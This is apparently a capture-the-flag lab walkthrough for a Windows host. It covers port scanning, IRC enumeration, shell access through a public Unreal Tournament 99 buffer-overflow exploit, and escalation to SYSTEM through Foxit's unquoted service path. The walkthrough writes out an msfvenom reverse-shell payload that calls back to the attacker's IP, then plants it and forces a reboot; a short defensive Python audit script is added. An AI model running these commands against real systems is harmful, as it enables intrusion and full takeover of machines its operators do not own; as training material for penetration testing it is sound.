Overview

Enumeration

Start with an Nmap scan as usual:

```text
$ nmap $ip -sVC -oN nmapInitial.txt -Pn
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.16 (OpenSSL/1.0.1p PHP/5.6.12)
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.16 (Win32) OpenSSL/1.0.1p PHP/5.6.12
| http-methods:
|_ Potentially risky methods: TRACE
3306/tcp open mysql MySQL (unauthorized)
6666/tcp open irc InspIRCd
6667/tcp open irc InspIRCd
6668/tcp open irc InspIRCd
6669/tcp open irc InspIRCd
6689/tcp open irc InspIRCd
6692/tcp open irc InspIRCd
6699/tcp open irc InspIRCd
6779/tcp open irc InspIRCd
6788/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 3
| servers: 1
| chans: 1
| lusers: 3
| lservers: 0
| source ident: nmap
| source host: 192.168.49.240
|_ error: Closing link: (nmap@192.168.49.240) [Client exited]
6789/tcp open irc InspIRCd
6792/tcp open irc InspIRCd
6839/tcp open irc InspIRCd
6881/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 2
| servers: 1
| chans: 1
| lusers: 3
| lservers: 0
| source ident: nmap
| source host: 192.168.49.240
|_ error: Closing link: (nmap@192.168.49.240) [Client exited]
6901/tcp open irc InspIRCd
| irc-info:
| server: irc.madcowz.localdomain
| users: 4
| servers: 1
| chans: 1
| lusers: 4
| lservers: 0
| source ident: nmap
| source host: 192.168.49.240
|_ error: Closing link: (nmap@192.168.49.240) [Client exited]
6969/tcp open irc InspIRCd
7000/tcp open irc InspIRCd
7001/tcp open tcpwrapped
7007/tcp open irc InspIRCd
```

IRC

Connecting to one of the InspIRCd ports with netcat and issuing ADMIN and LIST returns the server's administrative contact and a single channel whose topic advertises an Unreal Tournament 99 game server on port 7778:

```text
$ nc -vn $ip 6683
USER ran213eqdw123 0 * ran213eqdw123
NICK ran213eqdw123
ADMIN
:irc.madcowz.localdomain 256 ran213eqdw123 :Administrative info for irc.madcowz.localdomain
:irc.madcowz.localdomain 257 ran213eqdw123 :Name - Fluffy Cow
:irc.madcowz.localdomain 258 ran213eqdw123 :Nickname - Fluffy
:irc.madcowz.localdomain 259 ran213eqdw123 :E-Mail - fluffycow@localdomain
list
:irc.madcowz.localdomain 321 ran213eqdw123 Channel :Users Name
:irc.madcowz.localdomain 322 ran213eqdw123 #ut99 1 :[+nt] Fragging since UT99! Unreal Tournament 99 Game Server UP! IP: *THIS* Port: 7778
:irc.madcowz.localdomain 323 ran213eqdw123 :End of channel list.
```

Exploitation

Initial Access

The game server advertised in the channel topic has a public SEH buffer-overflow exploit: Unreal Tournament - Remote BOF(SEH) - Exploit-db

Run the exploit against port 7778 with a listener waiting on port 80; the callback arrives as the user daisy:

```text
$ perl ut99-bof.pl 192.168.240.44 7778 192.168.49.240 80
$ rlwrap nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.240] from (UNKNOWN) [192.168.240.44] 49236
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\UnrealTournament\System>whoami
fluffy-pc\daisy
```

Privilege escalation

Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation - Exploit-db

The installers left in C:\ftp show what is installed on the host, including the Foxit Reader 7.0.6.1126 setup referenced above:

```text
C:\>cd ftp
cd ftp
C:\ftp>dir
dir
Volume in drive C is HDD
Volume Serial Number is DC74-4FCB
Directory of C:\ftp
10/07/2015 05:21 AM <DIR> .
10/07/2015 05:21 AM <DIR> ..
10/07/2015 12:44 PM 35,984,520 FoxitReader706.1126_enu_Setup.exe
10/07/2015 03:46 AM 35,922,892 KB968930.msu
10/07/2015 12:45 PM 114,238,280 xampp-win32-5.6.12-0-VC11-installer.exe
3 File(s) 186,145,692 bytes
2 Dir(s) 13,053,009,920 bytes free
```

Query the service configuration. Note that BINARY_PATH_NAME is not quoted even though it contains spaces, the service starts automatically, and it runs as LocalSystem:

```text
C:\UnrealTournament\System>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
```

Because the path is unquoted, Windows tries each space-delimited prefix (for example C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit.exe) before the real executable, so a directory on that path that the current user can write to is enough. Test write access in the Foxit Reader directory:

```text
C:\Program Files (x86)\Foxit Software\Foxit Reader>echo test >> test.txt
echo test >> test.txt
C:\Program Files (x86)\Foxit Software\Foxit Reader>type test.txt
type test.txt
test
```
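As an added example (not part of the original writeup), the following Python parses the `sc qc` output shown above, flags the unquoted image path, lists the executables Windows would try in order (so an administrator knows which directories must not be writable by standard users), and emits the `sc config` command that quotes the path. The function names are my own and the embedded sample is constructed from the output above.

```python
# Sample input constructed from the `sc qc FoxitCloudUpdateService` output above.
SC_QC_OUTPUT = """\
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\\Program Files (x86)\\Foxit Software\\Foxit Reader\\Foxit Cloud\\FCUpdateService.exe
SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Turn the 'KEY : value' lines printed by sc qc into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def is_unquoted_with_spaces(image_path):  # such a path is ambiguous to CreateProcess
    return not image_path.startswith('"') and " " in image_path

def candidate_executables(image_path):
    """Executables Windows tries, in order, for an unquoted image path.

    CreateProcess splits at each space and tries the text before it as the
    program (adding .exe if it has no extension) before the full path, so no
    candidate's parent directory may be writable by standard users.
    """
    if not is_unquoted_with_spaces(image_path):
        return [image_path.strip('"')]
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens)):
        prefix = " ".join(tokens[:i])
        if "." not in prefix.rsplit("\\", 1)[-1]:  # last component has no extension
            prefix += ".exe"
        candidates.append(prefix)
    return candidates + [image_path]

def remediation_command(service_name, image_path):
    """The sc config command an administrator runs to quote the image path."""
    return 'sc config %s binPath= "\\"%s\\""' % (service_name, image_path.strip('"'))

def audit(sc_qc_text):
    """Risk summary for one service: unquoted path + LocalSystem = local privilege escalation."""
    f = parse_sc_qc(sc_qc_text)
    name, path = f["SERVICE_NAME"], f["BINARY_PATH_NAME"]
    unquoted = is_unquoted_with_spaces(path)
    return {"service": name, "runs_as": f.get("SERVICE_START_NAME", ""), "unquoted": unquoted,
            "candidates": candidate_executables(path) if unquoted else [],
            "fix": remediation_command(name, path) if unquoted else ""}
```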

Create a binary named Foxit.exe and place it at C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit.exe:

```text
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.240 LPORT=80 -f exe -o Foxit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: Foxit.exe
```

Since the service is set to auto start, restarting the target machine makes the Service Control Manager launch Foxit.exe as LocalSystem. Start the netcat listener first, then reboot:

```text
C:\Program Files (x86)\Foxit Software\Foxit Reader>shutdown.exe -r -f -t 1
```

```text
$ nc -nvlp 80
listening on [any] 80 ...
connect to [192.168.49.240] from (UNKNOWN) [192.168.240.44] 49155
Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
```